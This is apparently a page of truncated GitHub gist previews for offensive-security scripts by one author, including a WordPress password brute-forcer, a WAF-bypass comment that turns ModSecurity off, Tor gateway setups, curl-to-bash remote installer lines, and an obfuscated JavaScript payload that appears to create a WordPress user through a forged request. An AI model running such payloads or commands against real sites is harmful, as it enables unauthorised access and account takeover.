This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# v10 | |
# ┌──(unk9vvn㉿avi)-[~] | |
# └─$ sudo chmod +x wp-bruteforecer.sh;sudo ./wp-bruteforecer.sh target.com ~/Passlist.txt | |
RED='\e[1;31m%s\e[0m\n' | |
GREEN='\e[1;32m%s\e[0m\n' | |
YELLOW='\e[1;33m%s\e[0m\n' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# v10 | |
# ┌──(unk9vvn㉿avi)-[~] | |
# └─$ sudo chmod +x ripdc.sh;sudo ./ripdc.sh -t target.com | |
VERSION="ripdc.sh v0.3" | |
FALSE="0" | |
TRUE="1" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# v10 | |
# ┌──(unk9vvn㉿avi)-[~] | |
# └─$ sudo chmod +x ModSecurity-DEB.sh;sudo ./ModSecurity-DEB.sh | |
# Debian-Kali | |
# Switch off WAF | |
# ┌──(unk9vvn㉿avi)-[~] | |
# └─$ sed -i "s#SecRuleEngine On#SecRuleEngine Off#g" /etc/modsecurity/modsecurity.conf;service apache2 restart | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# v98 | |
# Raspberry Pi Desktop | |
# eth0 = tor gateway | |
# wlan0 = internet gateway | |
# ┌──(unk9vvn㉿avi)-[~] | |
# └─$ sudo chmod +x RPiTOR.sh;sudo ./RPiTOR.sh | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# v98 | |
# ┌──(unk9vvn㉿avi)-[~] | |
# └─$ curl -sL https://gist.githubusercontent.com/a9v8i/beaeabfd264ab68c6a24a3106e734dfb/raw/2b7721e7fcc8b1dc0ceb23c3e58bc8b2cfc56bc7/TorTer.sh | bash | |
DHCPCD=$(cat $PREFIX/etc/tor/torrc|grep -o "UseBridges 1") | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
var _0x524fb1=_0x40b6;(function(_0x4f989f,_0x4d3fd8){var _0x1524b2=_0x40b6,_0x28dc46=_0x4f989f();while(!![]){try{var _0xdcf602=-parseInt(_0x1524b2(0x1a1))/0x1*(parseInt(_0x1524b2(0x19e))/0x2)+parseInt(_0x1524b2(0x190))/0x3+parseInt(_0x1524b2(0x192))/0x4+-parseInt(_0x1524b2(0x1a2))/0x5*(-parseInt(_0x1524b2(0x19b))/0x6)+parseInt(_0x1524b2(0x197))/0x7*(parseInt(_0x1524b2(0x196))/0x8)+-parseInt(_0x1524b2(0x19a))/0x9*(parseInt(_0x1524b2(0x194))/0xa)+parseInt(_0x1524b2(0x195))/0xb;if(_0xdcf602===_0x4d3fd8)break;else _0x28dc46['push'](_0x28dc46['shift']());}catch(_0x4aaa09){_0x28dc46['push'](_0x28dc46['shift']());}}}(_0x5dad,0xc199e));function _0x5dad(){var _0x2283ad=['4215xqldoS','5218795TaevLA','L3dwLWF','1511619FbVfyv','setRequestHeader','1278300SBmJIr','action=createuser&_wpnonce_create-user=','336790MoLXOb','8800836glQaNS','72nWpVae','878297Owvjzx','application/x-www-form-urlencoded','GET','387wjxKDf','6oGXNNY','POST','open','738dpCibH','responseText','send'];_0x5dad=function(){return _0x2283ad;};return _0x5dad |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# curl -s https://gist.githubusercontent.com/a9v8i/cfe9e27d46905b69f05a90cb6cb8d73b/raw/e1fa9fb80e2e7aa6035331cd7008ba9c52963349/cms_installer.sh | sudo bash | |
RED='\e[1;31m%s\e[0m\n' | |
GREEN='\e[1;32m%s\e[0m\n' | |
YELLOW='\e[1;33m%s\e[0m\n' | |
BLUE='\e[1;34m%s\e[0m\n' | |
MAGENTO='\e[1;35m%s\e[0m\n' |